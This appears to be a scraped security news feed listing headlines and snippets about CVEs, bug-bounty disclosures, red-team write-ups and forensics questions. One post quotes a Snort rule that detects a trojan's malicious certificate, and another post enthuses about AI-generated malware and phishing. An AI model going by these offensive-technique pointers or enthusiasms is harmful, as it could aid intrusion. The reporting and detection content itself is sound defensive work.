    Got to thinking about this after the recent Eufy discoveries (only local storage isn't only local, not encrypted). With IoT it isn't a surprise that these cameras have low security, but does anyone know if it's all the same crap with cameras being sold as part of home alarm packages from security companies? submitted by /u/3859160912653957 [link] [comments]
  • Open

    Advent of Cyber 2022 [Day3] — OSINT Nothing escapes detective McRed — Writeup
    OSINT Nothing escapes detective McRed Writeup ~December 3, Karthikeyan Nagaraj Continue reading on System Weakness »
    Working with data leaks…
    It often happens that a long-forgotten old is recognized as new. This year, a similar thing happened with the domestic software product… Continue reading on Medium »
    Let’s talk about the exploration of cryptocurrencies…
    The year began under the star “Crystal” https://explorer.crystalblockchain.com/ a free and public (at that time) Bitcoin explorer that… Continue reading on Medium »
  • Open

    AI scripts ways to abuse PowerShell Functions
    We have seen AI write scripts and whatnot, but what if you tell it not to use a specific function? I did a quick video showcasing how AI can adapt to abusing some Powershell functions. I also asked it questions regarding ethical concerns. https://youtu.be/2xdqXiIEkvU Looking to gather everyone's thoughts on future use cases on this, where do you see the role of AI for the Red Team? It can create more sophisticated attack strategies, automate the gathering and analyzing of data, and even identify weaknesses in existing networks and systems. AI can also be used to develop more effective social engineering techniques, such as generating convincing phishing emails, and can even be used to automate generating malicious payloads. Further, AI can automate identifying new target systems, exploiting them, and creating more effective post-exploitation strategies. submitted by /u/Techryptic [link] [comments]
  • Open

    Trying to download multiple large folders from fsck.technology - help?
    submitted by /u/iissmarter [link] [comments]
  • Open

    Using AI to write Malware?! (Ethical reasoning and future use cases)
    submitted by /u/Techryptic [link] [comments]
  • Open

    SecWiki News 2022-12-03 Review
    Web Vulnerability Discovery Basics series by ourren; [HTB] Secret Writeup by 0x584a; THREAT-crawl: Automated Method and Tool to Crawl Criminal Underground Forums by 路人甲; Evolution and Analysis of the Development of Cyber Ranges at Home and Abroad by ourren. For more of the latest articles, visit SecWiki
  • Open

    [KIS-2022-06] Drupal H5P Module <= 2.0.0 (isValidPackage) Zip Slip Vulnerability
    submitted by /u/eg1x [link] [comments]
    Pre-Auth RCE with CodeQL in Under 20 Minutes
    submitted by /u/Gallus [link] [comments]
    kitabisa/teler release v2.0.0-dev
    submitted by /u/dwisiswant0 [link] [comments]
  • Open

    The Windows Process Journey — csrss.exe (Client Server Runtime Subsystem)
    The goal of “csrss.exe” (Client Server Runtime Subsystem) is to be the user-mode part of the Win32 subsystem (which is responsible for providing the Windows API). “csrss.exe” is included in Windows from Windows NT 3.1. It is located at “%windir%\System32\csrss.exe” (which is most of the time C:\Windows\System32\csrss.exe). From Windows NT 4.0 most of the Win32 subsystem has been moved to kernel mode — “With this new release, the Window Manager, GDI, and related graphics device drivers have been moved to the Windows NT Executive running in kernel mode” (https://learn.microsoft.com/en-us/previous-versions//cc750820(v=technet.10)?redirectedfrom=MSDN#XSLTsection124121120120?redirectedfrom=MSDN#XSLTsection124121120120)). Thus “csrss.exe” manages today GUI shutdowns and windows console (today i…
    Very large RAID acquisition and FTK Imager
    Has anybody tried to image a large amount of data 10TB or more with FTK imager? I brought about 25tb to my scene in the form of several 1-4tb hdds. I thought I would be using my hardware imagers but turns out customer’s RAID is what I need to acquire. (Last second incident response…) The RAID shows up in FTK imager as one drive 10-15tb in size. I want to know if I can use FTK imager to start acquiring without it breaking the imaging operation as I switch out disks. Anybody ever encounter this or had success or failure? submitted by /u/Muhlgasm [link] [comments]
  • Open

    CVE-2022-35260: .netrc parser out-of-bounds access
    Internet Bug Bounty disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1753224 - Bounty: $480

  • Open

    Do you know anyone, if anyone, that has non-computer related felonies on their record in the field?
    I was wondering what the reality of the situation is - reason I chose red teaming was because bug bounties and there being no barrier to entry there. Blue teaming stuff you pretty much need someone’s permission to access their environment in order to do your job. I messed up as a young guy, and have been spending the past couple years trying to right my wrongs with society, myself and my family; but it’s been tough to find someone to take a shot. I do currently help with boot camps and getting students where they need to be, but I myself haven’t been able to land a role while a lot of people who’ve gone through our programs have. Currently going through the OSCP to try and cement my technical ability on paper in hopes it might overshadow that + doing a bachelors at WGU as well. Any tips for a young professional trying to keep this dream alive? submitted by /u/Swoozyed [link] [comments]
    What do you think about this image?
    https://preview.redd.it/rs73y8gjej3a1.jpg?width=479&format=pjpg&auto=webp&s=96f9e6955302c1b4c5562daa7a03b8f4dbcf9d02 submitted by /u/pacman0026 [link] [comments]
  • Open

    Regenerate session ID after password change?
    So I understand the purpose of regenerating a session ID after a state change such as authenticating, i.e. to prevent session fixation. What I'm not clear on is why this would be necessary after a password change (as recommended by OWASP). If an attacker has hijacked the victim's session cookie, yes, invalidating that sessionID would kick the attacker off, but why should that be done specifically at the time of a password change? Is it because there is an assumption that if a user is changing their password, that they may suspect their account has been compromised? Otherwise, a password change seems like an arbitrary time to regenerate the sessionID. In the case of an attacker who has stolen the victim's password: the attacker will have his own session. Regenerating the sessionID after password change would not affect the attacker's session, would it? (On that note -- is the current best practice to invalidate ALL sessions after a password change? I seem to be getting varying answers on this.) TIA submitted by /u/m8trix09 [link] [comments]
    What is the general security agreement on using Samsung Pass or Apple iCloud keychain?
    Hello, What is your opinion / do you know a good review about the general security of Samsung Pass or Apple iCloud keychain? I am interested in whether their implemented solution to access stored passwords in their own app (Samsung Pass: fingerprint) and the general password security / storing is considered secure. In other words: do they have more secure password protection than using a general password manager, like 1Password or Bitwarden? Should I be more concerned about my password when a hacker attacks Samsung Pass / iCloud keychain than when using 1Password or Bitwarden? Thank you! submitted by /u/question_house [link] [comments]
    Industry Standard 401K policy?
    I met my 401K max very early this year. I am being told that my company will no longer contribute the company match since I am no longer contributing. I am being told this is "industry standard". I think it's split, but previous companies I've worked for continued to pay the company match after the employee limit was met. Does anyone know if your company will continue to pay the company match if the personal 401K limit has been reached? submitted by /u/throwaway401kquestn [link] [comments]
    What is a pen testers day to day like?
    Hi. I would like to get into pen testing after college, and I would like to know what it's like in the day of a pen tester? submitted by /u/AlternativeNo5023 [link] [comments]
    Why does universal device-to-device encryption not exist on a MAC/IP level?
    Every device on the internet has a MAC address and an IP address. Every device on the internet makes connections to other devices with MAC addresses and IP addresses. The majority of those devices generally expect that connection to be secure and private. Why does every device not generate a private/public encryption key alongside its MAC address and then perform ECDH (I think that is the latest and greatest, right?) every time it connects to a new router, etc.? Why does every device not generate a private/public encryption key alongside its IP address, and simply end-to-end secure (literally on a device-to-device level) every connection? Obviously it would be nice to opt out of this for something like gaming, but why is everything just left arbitrarily (and usually either messy, inefficient, or insecure) up to each individual app/server/connection? submitted by /u/Tough-Win-9367 [link] [comments]
    Malware Targeting Industrial Networks Published Openly on Github with Source Code for Researchers
    VX-Underground recently released a new malware strain targeting ICS systems which was later revealed by RoseSecurity (https://github.com/RoseSecurity/SIMATIC-SMACKDOWN). The initial disclosure was made on (https://twitter.com/vxunderground/status/1597953674353205249). Think this could get researchers onboard with locking down these networks? [link] [comments]
    Network Security Engineer Day to Day tasks
    Hi, I'm interested in NetSec roles; job descriptions feel pretty vague and I feel unprepared for the role. What are the daily tasks of NetSec ( FW concentrated roles ) You can rely on internal/vendor documentation / Google you don't need to know to configure/TShoot every feature from the top of your head right? submitted by /u/Odd-Jump-3066 [link] [comments]
    Spear Phishing emails escalate to spear phishing text message
    My work uses a terrible CMS that does not properly hide the email addresses listed on our website. Our executives insist on having all of our email addresses published on our site. Complete clusterfuck! Since the day I started, everyone at the company receives frequent spear phishing emails. The emails always pretend to come from the CEO. If you reply they will eventually ask you to purchase gift cards. As soon as I started with the company we enabled email protection and stopped the attackers from being able to spoof our CEO's email address. Now they just open random gmail addresses like [cucksucker3000@gmail.com](mailto:cucksucker3000@gmail.com) and pretend to be our CEO to other employees; these get flagged by our spam filter and email system policies (DMARC/DKIM/SPF, etc.). We train our users on cyber security, to spot phishing emails if they get through. Because of all this I don't think these attacks have been very fruitful to the attackers. Recently they've moved on to something new. They are now texting some of our employees from random out of state phone numbers pretending to be the CEO. THIS IS NEW TO US. Our personal cellphone numbers are not published on our website. Does this mean they are looking up our employees' cell phone numbers? Cross-referencing them with the data that they scraped off of our website? Has anyone else experienced this recently, where spear phishing emails escalate to spear phishing SMS messages? It really seems like it's from the same attackers. TIA submitted by /u/bluntasfuck [link] [comments]
    Tools for leaked email/password in previous breaches/dark web
    Is there any simple tool/open source tool that can tell if any employee's corporate email account/password was leaked in breaches or in the dark web? submitted by /u/Calm_Scene [link] [comments]
    Cybersecurity for developers
    What are the roles in cybersecurity that an AppDev or WebDev can pursue? submitted by /u/NewbieInTech00 [link] [comments]
  • Open

    Exposed Cortex API at https://cortex-ingest.shopifycloud.com/
    Shopify disclosed a bug submitted by ian: https://hackerone.com/reports/1258871 - Bounty: $6300
    POST following PUT confusion
    Internet Bug Bounty disclosed a bug submitted by robbotic: https://hackerone.com/reports/1752146 - Bounty: $2400
    XSS in Acronis Cloud Manager Admin Portal
    Acronis disclosed a bug submitted by mooimacow: https://hackerone.com/reports/1388788 - Bounty: $100
    Authentication bypass in https://nin.mtn.ng
    MTN Group disclosed a bug submitted by roland_hack: https://hackerone.com/reports/1747146
  • Open

    Best way to go through a samsung backup?
    I have an external backup that was saved through smart switch backup onto pc from a samsung phone. What is the best way to go through the data? submitted by /u/JackedTORtoise [link] [comments]
    memory dump with FTK Imager
    I created a memory dump with FTK Imager. I only see in the evidence tree "memcapture.ad1" and memory Dump [AD]1. And I only see in the file list 2 files: memdump.mem and pagefile.sys. Is this normal? What can I do with these files? submitted by /u/Least_Lab375 [link] [comments]
  • Open

    TryHackMe | Red Team Fundamentals WriteUp
    This room is an introduction to red teaming. Continue reading on Medium »
    Using Discord as Command and Control (C2) with Python and Nuitka
    Hello fellow red teamers, I was thinking of a way to obfuscate C2 traffic and got myself an idea. Why not chain the traffic over some… Continue reading on Medium »
    Hacking Hyundai and Genesis cars
    We recently discovered a vulnerability affecting Hyundai and Genesis cars that can be used to remotely control the locks… Continue reading on Medium »
    Even more about car hacking
    Earlier this year we were able to remotely unlock, start, locate, flash the lights of and honk the horn of any remotely connected… Continue reading on Medium »
  • Open

    [WRITE-UP] Irremovable comments on the FB Lite app | A story of a simple FB Lite bug that I found…
    Hi guys, I’m Shubham Bhamare again. In this write-up, I’m going to tell you how I found a simple FB Lite bug that restricted FB Lite app… Continue reading on Medium »
    Hello Everyone!
    We’ll be learning about building computers, creating tools, automating the recurring process to save time and let us focus on the… Continue reading on Medium »
    webdriver_prefs.json — File Not Found Error Solved in Linux | Eyewitness | Kali Linux
    FileNotFoundError: No such file or directory: /webdriver/firefox/webdriver_prefs.json — Error Solved | November 2022 | Karthikeyan Nagaraj Continue reading on System Weakness »
    What is Bug Bounty?
    And how you can make Continue reading on Medium »
    Interesting find on the Invite link
    Find a vulnerability in an Invite link Continue reading on Medium »
    Sql injection
    This is for information only, and this scenario has been encountered more than once, but it must be noted Continue reading on Medium »
  • Open

    Fuzzing Ping(8)
    Article URL: https://tlakh.xyz/fuzzing-ping.html Comments URL: https://news.ycombinator.com/item?id=33833715 Points: 10 # Comments: 0
    Fuzzing Weekly CW 48: Introducing Afl-Ruby: Fuzz your Ruby programs using afl
    Article URL: https://ioc.exchange/@FuzzingWeekly/109444121411765283 Comments URL: https://news.ycombinator.com/item?id=33829741 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-12-02 Review
    A Detailed Look at Loading Cobalt Strike (CS) Separated Shellcode by ourren; Building an Enterprise-Grade Phishing Drill Platform by 路人甲; POLYGLOT: A Universal Language-Processor Fuzzing Engine Using Semantic Validation by ourren; Tenda AX12 Device Analysis by 路人甲; Privacy Computing Online MOOC by 路人甲. For more of the latest articles, visit SecWiki
  • Open

    🤯 Mind-Blowing examples of OpenAI ChatGPT for Security, Infosec & Hacking
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Blowing Cobalt Strike Out of the Water With Memory Analysis
    Unit 42 researchers examine several malware samples that incorporate Cobalt Strike components, and discuss some of the ways that we catch these samples by analyzing artifacts from the deltas in process memory at key points of execution. We will also discuss the evasion tactics used by these threats, and other issues that make their analysis problematic. The post Blowing Cobalt Strike Out of the Water With Memory Analysis appeared first on Unit 42.
  • Open

    #FuzzingWeekly CW 48
    Looking for Remote Code Execution bugs in the Linux kernel: https://xairy.io/articles/syzkaller-external-network Continue reading on Medium »
  • Open

    Redigo — New Redis Backdoor Malware
    submitted by /u/gfdgfbal
    Certpotato : using adcs to privesc from service accounts to local system
    submitted by /u/qwerty0x41
    VLC : Integer overflow in vnc module - CVE-2022-41325
    submitted by /u/jeandrew
    XSS on account.leagueoflegends.com via easyXDM [2016]
    submitted by /u/bored-engineer
    Visual Studio Code: Remote Code Execution
    submitted by /u/Zemnmez

    Mac phishing, getting a root-privileged CS callback and maintaining access, and how to resolve all the pitfalls
    Mac phishing, getting a root-privileged CS callback and maintaining access, and how to resolve all the pitfalls. Shared for learning purposes.
    First case nationwide! Yunnan cracks a major domain-name black-market case, arresting 630 people
    Under the organization and command of the Ministry of Public Security, Yunnan public security organs spent more than 8 months successfully cracking the country's first domain-name black-market criminal case.
    FreeBuf Weekly | Facebook fined 265 million euros over data leak; LastPass admits customer data was stolen
    It's weekly-report time! We have summarized and recommended this week's hot news, security incidents, good reads and handy tools, so that nobody misses any of this week's highlights!
    Undetected for ten years! Hyundai vehicles exposed to a major security flaw that lets hackers remotely unlock and start cars
    The vulnerability has existed for 10 years and affects Hyundai cars manufactured since 2012, as well as those of its premium brand Genesis.
    Quick look! Redis servers are being backdoored
    The malware is named Redigo after its target machines and the programming language it is built in.
    After the massive Medibank data breach, Australia urgently raises fines to 50 million
    Hackers have once again published sensitive Medibank customer data on the dark web; this is the latest of several consecutive releases of the stolen data.
    "Schoolyard Bully" trojan steals Facebook credentials of 300,000 Android users
    The "Schoolyard Bully" trojan disguises itself as legitimate education-themed apps, lures unsuspecting users into downloading it, and then steals their Facebook credentials.

    Route Analysis (Information Gathering)
    A Routing Analysis is a type of network analysis that determines the optimal path or route, from one network location to another or… Continue reading on System Weakness »

    3 Free Videos to Turbocharge Your Infosec Journey
    No content preview

    CVE-2022-29464: WSO2 API Manager arbitrary file upload and remote code execution vulnerability
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/K9nmiwr8yL5tVxiLnhFDmA Vulnerability description: certain WSO2 products allow unrestricted file upload, leading to remote code execution. Take WSO2 API Manager as an example: it is a fully open-source API management platform. It supports API design, API publishing, lifecycle management, application development, API security, rate limiting, viewing AP...

    Random Christmas TV episodes from UK and US
    submitted by /u/GeniusOfLove74

    Platform certificates used to sign Android malware
    submitted by /u/ScottContini
    UART Essential for Pentester
    submitted by /u/Void_Sec
    Windows Exploitation Challenge - Blue Frost Security 2022 - VoidSec
    submitted by /u/Void_Sec
    Huawei Security Hypervisor Vulnerability
    submitted by /u/jeandrew
    How we found a supply-chain vulnerability in IBM Cloud Databases for PostgreSQL
    submitted by /u/sagitz_
    The CI/CD Goat just got wilder! - A new challenge to the deliberately vulnerable CI/CD environment
    submitted by /u/TupleType
    Unauthenticated Command Injection in Asus M25 NAS
    submitted by /u/g_e_r_h_a_r_d
    Bypassing Web Application Firewalls
    submitted by /u/ma-ni
    Remote code execution bug in FreeBSD's ping (CVE-2022-23093)
    submitted by /u/Gallus
    Notice of Recent Security Incident - The LastPass Blog
    submitted by /u/svmseric
    Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) - SUID-root program installed by default on Ubuntu
    submitted by /u/Gallus
    Black Hat USA 2022 Conference Recordings
    submitted by /u/sanitybit
    RFC 8628 lets you phish people even if they're using WebAuthn
    submitted by /u/sanitybit

    Stored XSS in /admin/product and /admin/collections
    Shopify disclosed a bug submitted by ashketchum: https://hackerone.com/reports/1147433 - Bounty: $5300
    Disconnecting an external login provider does not revoke session
    Shopify disclosed a bug submitted by attackerbhai: https://hackerone.com/reports/1547684 - Bounty: $1600
    Read/Write arbitrary (non-HttpOnly) cookies on checkout pages via GoogleAnalyticsAdditionalScripts postMessage handler
    Shopify disclosed a bug submitted by bored-engineer: https://hackerone.com/reports/1081167 - Bounty: $1600
    Subdomain Takeover at course.oberlo.com
    Shopify disclosed a bug submitted by m7mdharoun: https://hackerone.com/reports/1690951
    Remove Every User, Admin, And Owner Out Of Their Teams on developers.mtn.com via IDOR + Information Disclosure
    MTN Group disclosed a bug submitted by wallotry: https://hackerone.com/reports/1448550
    Unprotected Direct Object Reference
    MTN Group disclosed a bug submitted by coyemerald: https://hackerone.com/reports/1536936
    Firebase Database Takeover in https://pulseradio.mtn.co.ug/
    MTN Group disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1447751
    Calendar name length not validated before writing to database
    Nextcloud disclosed a bug submitted by errorx404: https://hackerone.com/reports/1596148
    CVE-2022-45402: Apache Airflow: Open redirect during login
    Internet Bug Bounty disclosed a bug submitted by bugra: https://hackerone.com/reports/1782514 - Bounty: $2400
    Double evaluation in .bash_prompt of dotfiles allows a malicious repository to execute arbitrary commands
    Ian Dunn disclosed a bug submitted by ryotak: https://hackerone.com/reports/1785378 - Bounty: $300

    Applying for a job and they need to see my NDA contract and need to fill out a form regarding my government agency work — is this normal?
    I’m applying for jobs after graduation and a job I’m really interested in requested to see my NDA contract. In fact, it’s contingent on this. And I need to fill out a form regarding my government agency work — is this normal? submitted by /u/hungry_squared_hippo
    Is my theory that many small businesses could do without Windows & AD reasonable?
    I made a LinkedIn post that was well received by my 99% cybersec connection pool, but LI isn’t the place for critical feedback and that’s what I’m looking for here. I’ll link the post but can summarize it easily: I propose an extreme version of attack surface reduction for small businesses who mostly use apps that exist in a web browser (Quickbooks, Microsoft Office, Google Docs, Dropbox, etc) by replacing Active Directory + Windows (and all the potential for mistakes + cost to avoid them) with Chrome OS Flex (which updates itself), where their local network is treated like untrusted Café Wi-Fi. Some local security / tech leaders reached out with interests in facilitating some sort of pilot test. I’ve been tinkering with the OS and thinking through what friction / problems we might run into. Not for everyone: Some companies will have apps they can’t replace with websites. If that’s too prevalent throughout the business, it’s a no-go. Plan to possibly test it slowly with a fraction of a business’s employees at first and just see how it goes. Any thoughts / concerns? submitted by /u/Jonathan-Todd
    SOC Analyst
    I'm 22 years old and I don't have any degree; in 2/3 years I'll get my computer high school diploma. Is self-taught study enough to get a job as a SOC analyst in Europe? (In Europe CompTIA certifications are not very valuable.) Actually I'm learning C programming, computer architecture and Linux. submitted by /u/NewbieInTech00
    Is there an interactive trainer for Network Security like hackthebox?
    CyberSecurity has hackthebox, is there something similar for offensive Layer 2, 3 security? submitted by /u/Last-Literature206
    Strange certificates: State = Denial
    There is an old snort signature which is looking for some pretty specific fields, looks like this: alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TorrentLocker? CnC?)"; flow:established,to_client; tls_cert_subject; content:"C=US, ST=Denial, L=Springfield, O=Dis,"; fast_pattern; reference:url,sslbl.abuse.ch; classtype:trojan-activity; sid:2021938; rev:3; metadata:attack_target Client_and_Server, created_at 2015_10_08, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, tag SSL_Malicious_Cert, updated_at 2022_03_13, mitre_tactic_id TA0042, mitre_tactic_name Resource_Development, mitre_technique_id T1587, mitre_technique_name Develop_Capabilities;) As you can see it is loo…
    Default ports opened?
    Hi, I'm using the CSF firewall on a VPS, with cPanel for running websites. After installing CSF, these are the ports that are already opened by default in CSF: Screenshot: https://imgur.com/LAkZPZz Should I leave them open or delete some ports? I know 80, 443 and the SSH port are required to be open. Then some are the webmail port, cphulk, DNS port. But if you see the screenshot there are many other port numbers opened by default like ports 1 and 7. Should I delete them? cPanel requires these ports to be open: How to Configure Your Firewall for cPanel & WHM Services | cPanel & WHM Documentation. Should I just delete the default ports from CSF and copy-paste the ports listed on the cPanel site? submitted by /u/yoyobono
    TOR isn't cutting it anymore for my online anonymity, what should I do now?
    Since TOR uses several exit nodes worldwide, trying to sign into accounts I exclusively use in TOR for anonymity has suddenly become impractical if not impossible. Each site I try to sign into triggers a demand for a combination of 2-factor authentication, account questions, complex captchas, and then refuses to let me sign in completely. It gets worse when signing into one account requires 2-factor authentication through an email that itself demands another 2-factor authentication for yet another email asking for more 2-factor authentication. Recently, multiple sites just suspended my accounts all at once without cause and I can't stand it anymore. I just want to browse the internet in privacy dammit, I'm not trying to break the law or violate anyone's TOS. What should I do? submitted by /u/hechima_tawashi

    Hell’s Keychain: Supply-Chain Vulnerability in IBM Cloud Databases for Postgres
    Article URL: https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql Comments URL: https://news.ycombinator.com/item?id=33823695 Points: 1 # Comments: 0

    CVE-2022-3328: Race condition in snap-confine's must_mkdir_and_open_with_perms()
    Article URL: https://www.qualys.com/2022/11/30/cve-2022-3328/advisory-snap.txt Comments URL: https://news.ycombinator.com/item?id=33823006 Points: 2 # Comments: 0
    macOS Monterey still vulnerable to CVE-2022-40303
    Article URL: https://lapcatsoftware.com/articles/MontereyCVE.html Comments URL: https://news.ycombinator.com/item?id=33817539 Points: 20 # Comments: 0

    A Journey into Fuzzing WebAssembly Virtual Machine [BHUSA 2022]
    submitted by /u/pat_ventuzelo

    opendirindex.opensho.com - feedback
    A few months ago I posted a link to an OD indexer I was making: https://opendirindex.opensho.com/ I found the community's feedback very, very valuable in improving the site. So I come back to you guys with another round of questions and want to solicit more of your feedback. My first question is: do you feel like the results would be better if they were ordered based on the best results for the search, or ordered by the most recent results that meet the search criteria? I ask this question because I'm always afraid that my data will age out as ODs naturally come and go, hence the page currently showing the latest results. However, I am finding that this doesn't necessarily produce the best results for the search. And my second question is very open. What could I do to improve the search results overall? The look and feel of the search page is basically a spreadsheet, which I know isn't ideal. I would like some thoughts from the group on what would serve you guys best. Edit1: My SQL server crashed under the load. Edit2: Rebooted everything and it's back up now. submitted by /u/coldmateplus
    How do I download from this site
    I found this site on the internet that has lots of content, like really a lot! But I can't download anything from it. https://alchemist.cyou Any idea? submitted by /u/xShuOuma
    Music videos.
    http://80s.lt/Files/Videos/MusicVideos/ submitted by /u/blacksnake791B

    Where’s Klumgongyn? Writeup
    An old friend returns! Continue reading on The Sleuth Sheet »
    How I investigate crypto hacks and security incidents: A-Z
    | Much thanks vice.com for a mention! Continue reading on Medium »
    Lost Down Under Writeup
    Sometimes it’s hard to connect the dots. Continue reading on The Sleuth Sheet »
    Reflets.Info convicted by the courts: a dive into the heart of a controversial site
    The Paris Commercial Court has just ruled against the activist site Reflets in the case pitting it against Altice. At issue… Continue reading on Medium »
    Ghunt installation and guide to use
    Hi hacker!! Continue reading on Medium »
    Investigate Phone Number In Indonesia
    This post heavily focus on phone number investigation in Indonesia but this method can be used in general too. Continue reading on Medium »
    OSINT analysis  — SpiderFoot & theharvester (Information Gathering)
    In my previous article we discussed ‘Network and Port Scanners’ and before that it was ‘Live host Identification’, moving forward in the… Continue reading on System Weakness »

    Cannot parse Nicegram APK in Cellebrite PA.
    Hi, maybe anyone has a solution for parsing the Nicegram APK in Cellebrite PA (latest version). I have an FFS dump of an Android cell phone. The Nicegram APK is a Telegram client that was installed on the suspect's phone. Telegram itself is supported by PA after FFS extraction. But the Nicegram APK isn't supported by PA. What is the reason, maybe? submitted by /u/ConsiderationLucky96
    Trying to find the URL a file was downloaded from.
    Hi. The user's default browser is Chrome so I am using "Hindsight" to see all the user's browsing history. I do see in the "URL" column the file that I am looking for, except this is what is shown in the URL column: blob:null/dd2e4db5-20ab-45df-b0aa-8b183daebc1f and this is the "Data/Value/Path" column: C:\Users\User1\Downloads\Chrome.js I've never seen "blob:null" before in the URL column. I think this is some sort of object blob inside of an iframe which gets automatically downloaded when a user visits that page/site? submitted by /u/antmar9041
    Help with memory capture file for a class.
    The scenario is that the memory dump that I downloaded is only partial due to the computer hard drive failing during the capture. I am trying to get the file to a state where it can be opened in Autopsy to be examined, but it currently cannot be read by FTK (the point of the challenge) and can only be opened in HxD. I do have the file but do not know the rules on posting or linking to a file. Hopefully this isn't the completely wrong place to ask; desperate times. submitted by /u/AvocadoCultist

    The Top 8 Bug Hunting Tools for P1 Bug Bounties
    TL;DR- The absolute essentials in bug bounty hunting, from beginner level to advanced pen-testing frameworks for P1 bug bounties. Continue reading on The Gray Area »
    Stored XSS in the college's classroom² + a bonus reflected XSS.
    If you don't know me, I am a young graduate in Systems Analysis and Development, and also a graduate in Information Security and… Continue reading on Medium »
    XSS on account.leagueoflegends.com via easyXDM [2016]
    This post contains a chain of vulnerabilities I responsibly disclosed to Riot Games in November of 2016. I’m publicly disclosing it now as… Continue reading on Medium »
    EXPLOITATION / HUNTING OF LOCAL FILE INCLUSION (LFI)
    KIDNAPSHADOW Continue reading on Medium »
    88MPH Theft Of Unclaimed MPH Rewards Bugfix Review
    Summary Continue reading on Immunefi »
    Banner grabbing leads to RCE
    What is a Grabbing Attack? Continue reading on Medium »
    From Bug Hunter to Threat Researcher!!
    Assalamu-Alikum Continue reading on Medium »
    IDOR Disclose User Pending Trip Information | Part 01
    Hi Amazing Hackers & Security Enthusiasts, today I am going to write about something very important. Identifying IDOR bugs that lead to… Continue reading on Medium »
    SQL Injection — Application Korlantas POLRI
    April 13, 2021 Continue reading on Medium »
    The Ultimate List of Bug Hunting Resources for Beginners
    TL;DR- If you’re new to cybersecurity, you’ll absolutely want to take a look at one of the highest earning activities for white-hat… Continue reading on The Gray Area »
    Bug Bounty Campaign
    Overview Continue reading on Medium »

    Hacking Into Social Media Account using Social Engineering!
    No content preview
    DoS on a Wifi Router — Wifi Hacking #1
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 1] — No Answers :P
    I am so excited about this Cyber Advent from TryHackMe and today the 1st of December is Day 1. TryHackMe has a lot of prizes for this… Continue reading on InfoSec Write-ups »
    pentesting.cloud part 2: “Is there an echo in here?” AWS CTF walkthrough
    No content preview
    SSRF via DNS Rebinding (CVE-2022–4096)
    No content preview
    RAVEN 2 Walkthrough (OSWE like machine )
    No content preview

    Any hiring for a remote penetration tester position.
    I am a certified information systems security professional with 15 years’ experience in planning, designing, implementing, testing, and maintaining complex information systems who has great interpersonal skills, and the mindset to work under demanding and high-pressure conditions. Currently seeking a position in penetration testing where I can leverage my skillset to add further depth to the team, in return gaining knowledge and strengthening the overall security posture. I am well equipped to work remotely without interruption. Please DM me. My blog: newworldsamuraiexploits@github.io submitted by /u/newworldsamurai3030

    Stalking inside of your Chromium Browser
    Continue reading on Posts By SpecterOps Team Members »
    Jeeves (HTB — Retired)
    Just for disclaimer purposes this machine is under the retired group of machines. As a consequence, you can access it via a subscription… Continue reading on Medium »

    SecWiki News 2022-12-01 Review
    Discovering malware control-panel login pages via cyberspace search engines, by Avenger. For more recent articles, visit SecWiki.

    Looting iOS App’s Cache.db
    Insecure By Default: Mobile application assessments diverge somewhat from normal web application assessments, as there is an installed client application on a local device to go along with the backend server. Mobile applications can often work offline, and thus have a local store of data. This is commonly in the form of SQLite databases stored... The post Looting iOS App’s Cache.db appeared first on TrustedSec.

    CVE-2020-9273: ProFTPd RCE vulnerability analysis and exploitation
    Author: knaithe@天玄安全实验室. Original link: https://mp.weixin.qq.com/s/RJUFhx5F-wI_fmX8McMCiQ Vulnerability description: a use-after-free; by forging the pool_rec memory-pool control structure, a function pointer can be tampered with, leading to arbitrary command execution. Fix: https://github.com/proftpd/proftpd/commit/d388f7904d4c9a6d0ea5...
    CVE-2022-22972: VMware Workspace ONE Access authentication bypass vulnerability analysis
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/zVYQQgDjcwJKAnX8SZJ5Cw Vulnerability description: on May 18, VMware published an advisory (VMSA-2022-0014) addressing two vulnerabilities in multiple VMware products, including CVE-2022-22972, a flaw in authentication handling. A remote attacker can forge the relevant...

    Big news! Password manager LastPass admits hackers stole customer data
    LastPass has publicly admitted that, through a new breach, hackers accessed LastPass's third-party cloud storage server and obtained key information of some customers.
    Attack technique assessment | Analysis of typical BYOVD exploitation and Ring 0 defense-weakening techniques
    This article analyzes and assesses the BYOVD and defense-weakening techniques Lazarus used in this attack.
    FreeBuf Morning Report | A scam app specifically targets developing countries; Anker uploads data to the cloud without user consent
    Multinational healthcare organization Keralty suffered a ransomware attack that disrupted the websites and operations of the company and its subsidiaries.
    With 15 million installs, these scam apps specifically target developing countries
    They trap users in a loan spiral with fraudulent terms and use various methods to extort and harass borrowers.
    Google discovers a Windows exploitation framework used to deploy spyware
    Although already patched, these vulnerabilities were most likely used as zero-days in the wild.
    Three special sessions, four forums | CIS 2022 Cybersecurity Multidimensional Space-Time arrives
    On December 14, 2022, CIS 2022 Cybersecurity Multidimensional Space-Time will open on schedule, with the Shanghai main venue, the Shenzhen sub-venue and the online metaverse session all presented to attendees.
    Australian data protection requirements
    Australia's main legislation on personal data protection is the Privacy Act and its Australian Privacy Principles ("APPs"). In addition, there are the Privacy Regulation 2013, the legally binding Privacy (Credit Reporting) Code, and various rules and guidelines.
    Took over a year to resolve! Encryption-device supplier to Sony and Lexar leaked sensitive data
    The Cybernews research team's findings are as worrying as those of researcher Sylvain Pelissier in December 2021.

    Cache Deception Allows Cache Poisoning
    @bxmbn Continue reading on Medium »


    Bypassing The Client Side Encryption To Read Internal Windows Server Files
    Hey, once again it's me abhishekmorla, Continue reading on Medium »
    RAVEN 2 Walkthrough (OSWE like machine )
    Hi! My name is Hashar Mujahid and Today we are going to solve a room from vulnhub which is listed as OSWE like machine by TJ-Null. Continue reading on InfoSec Write-ups »
    ‘PTN’ infosec monthly #6 — InfoSec Updates
    Namaste everyone, Continue reading on Pentester Nepal »
    My Latest XSS Finding, Explained To Beginners | Bug Bounty
    It’s been a while since I posted a writeup so I thought it would be wise to make one for beginners. Continue reading on InfoSec Write-ups »
    Subdomain Takeover
